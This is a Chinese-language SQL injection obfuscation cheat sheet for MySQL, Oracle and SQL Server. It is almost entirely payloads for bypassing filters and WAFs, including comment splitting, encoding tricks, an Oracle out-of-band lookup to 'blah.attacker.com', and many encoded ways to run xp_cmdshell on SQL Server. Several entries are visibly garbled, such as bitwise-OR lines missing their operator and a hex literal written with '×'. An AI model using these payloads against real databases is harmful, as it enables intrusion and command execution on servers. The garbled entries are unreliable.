注入混淆

MySQL

描述 查询语句
ASCII > 字符
SELECT char(65)
字符 > ASCII
SELECT ascii('A')
十六进制
SELECT 0x4A414B45
十六进制 > 整数
SELECT 0x20 + 0x40
非十六进制/十六进制
unhex(hex(user()))
按位与
SELECT 6 & 2
按位或
SELECT 6
按位取反
SELECT ~6
按位异或
SELECT 6 ^ 2
右移
SELECT 6>>2
左移
SELECT 6<<2
字符串

SELECT substr('abcd', 3, 2)

substr(string, index, length)

Cast

SELECT cast('1' AS unsigned integer)

SELECT cast('123' AS char)

Concat

SELECT concat('snow','wolf')

SELECT 'snow' 'wo' 'lf'

无引号
SELECT CONCAT(CHAR(74),CHAR(65),CHAR(75),CHAR(69))
注释块
SELECT/*block comment*/"test"
单行注释

注释掉该行的其余部分

SELECT 1 -- 
SELECT 1 # 
SELECT 1 --+ - 
SELECT 1 --+- - 
SELECT 1 -- - - 
SELECT 1 %00 - 

内联注释
SEL/*_*/ECT * FR/*_*/OM
无空格
SELECT(username)FROM(USERS)WHERE(username='snowwolf')
允许的空格
09, 0A, 0B, 0C, 0D, A0, 20
URL Encode
SELECT%20%2A%20FROM%20USERS
两次URL Encode
SELECT%2520%2A%2520FROM%2520USERS
无效百分比编码
%SEL%ECT * F%R%OM U%S%ERS
字符串混淆
SeLeCt * FrOm

Oracle

描述 查询语句
ASCII转字符
SELECT char(65) from dual
字符转ASCII
SELECT ascii('A') from dual
按位与
SELECT 6 & 2 from dual
按位或
SELECT 6 from dual
按位取反
SELECT ~6 from dual
按位异或
SELECT 6 ^ 2 from dual
选择指定字符
SELECT substr('abcd', 3, 1) FROM dual;
字符串
SELECT substr('abcd', 3, 2) from dual substr(string, index, length)
Cast
select CAST(12 AS CHAR(32)) from dual
Concat
SELECT concat('net','spi') from dual
注释
SELECT 1 FROM dual --
IF语句
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
Case语句

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- Returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- Returns 2

延时

BEGIN DBMS_LOCK.SLEEP(5); END; (Requires Privileges)
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;

指定行
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;
按位与

SELECT bitand(6,2) FROM dual; -- Returns 2
SELECT bitand(6,1) FROM dual; -- Returns 0

字符串拼接
SELECT 'A' || 'B' FROM dual; -- Returns AB
规避引号
SELECT chr(65) || chr(66) FROM dual; -- Returns AB
十六进制加密
SELECT 0x75736572 FROM dual;

SQL Server

描述 查询语句
ASCII转字符
SELECT char(65)
字符转ASCII
SELECT ascii('A')
十六进制转整数
SELECT 0x20 + 0x40
按位与
SELECT 6 & 2
按位或
SELECT 6
按位取反
SELECT ~6
按位异或
SELECT 6 ^ 2
字符串

SELECT substring('abcd', 3, 2)

substring(string, index, length)

Cast

SELECT cast('1' AS unsigned integer)

SELECT cast('123' AS char)

Concat
SELECT concat('snow','wolf')
注释
SELECT 1 --comment SELECT/*comment*/1
规避引号
SELECT char(65)+char(66) -- returns AB
规避分号
%0dwaitfor+delay+'0:0:10'--
绕过Case过滤
EXEC xP_cMdsheLL 'dir';
  • 避免空格
EXEC/**/xp_cmdshell/**/'dir';--
';ex/**/ec xp_cmds/**/hell 'dir';
  • 通过concat避免查询检测
DECLARE @cmd as varchar(3000);SET @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+""+'d'+'i'+'r'+"";exec(@cmd);
  • 通过字符编码避免查询检测
DECLARE @cmd as varchar(3000);SET @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);
  • 通过Base64规避查询检测
DECLARE @data varchar(max), @XmlData xml;SET @data = 'ZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdkaXIn';SET @XmlData = CAST('' + @data + '' as xml);SET @data = CONVERT(varchar(max), @XmlData.value('(data)[1]', 'varbinary(max)'));exec (@data);
  • 通过Nchar加密规避查询检测
DECLARE @cmd as nvarchar(3000);SET @cmd =(nchar(101)+nchar(120)+nchar(101)+nchar(99)+nchar(32)+nchar(109)+nchar(97)+nchar(115)+nchar(116)+nchar(101)+nchar(114)+nchar(46)+nchar(46)+nchar(120)+nchar(112)+nchar(95)+nchar(99)+nchar(109)+nchar(100)+nchar(115)+nchar(104)+nchar(101)+nchar(108)+nchar(108)+nchar(32)+nchar(39)+nchar(100)+nchar(105)+nchar(114)+nchar(39)+nchar(59));EXEC(@cmd);
  • 通过二进制编码ASCII+Cast来规避查询检测
DECLARE @cmd as varchar(MAX);SET @cmd = cast(0x78705F636D647368656C6C202764697227 as varchar(MAX));exec(@cmd);
  • 通过二进制编码ASCII+Convert来规避查询检测
DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(MAX),0x78705F636D647368656C6C202764697227);exec(@cmd);
  • 通过varbinary来规避查询检测
DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227);exec(@cmd);
  • 通过使用sp_sqlexec规避执行
DECLARE @cmd as varchar(3000);SET @cmd = convert(varchar(0),0×78705F636D647368656C6C202764697227);exec sp_sqlexec @cmd;
  • 执行xp_cmdshell ‘dir’
DECLARE @tmp as varchar(MAX);
SET @tmp = char(88)+char(80)+char(95)+char(67)+char(77)+char(68)+char(83)+char(72)+char(69)+char(76)+char(76);
exec @tmp 'dir';